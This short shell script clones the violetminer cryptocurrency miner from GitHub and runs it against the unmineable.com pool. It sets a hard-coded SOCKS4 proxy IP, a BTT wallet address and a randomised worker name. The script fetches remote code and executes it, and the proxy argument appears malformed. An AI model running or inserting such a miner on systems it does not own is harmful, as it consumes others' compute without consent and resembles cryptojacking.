#!/bin/sh
apt-get update
git clone https://github.com/turtlecoin/violetminer
cd violetminer
PROXY=socks4://198.50.177.44:44699
./violetminer --algorithm wrkzcoin --pool rx.unmineable.com:3333 --username BTT:TXdAWjGw8RRYpkpZd6rXHEqRRwCPRnPe5B.$(echo $(shuf -i 1-99 -n 1)-Nasgor)#o6xy-0wd5 --password x $PROXY --threads 4
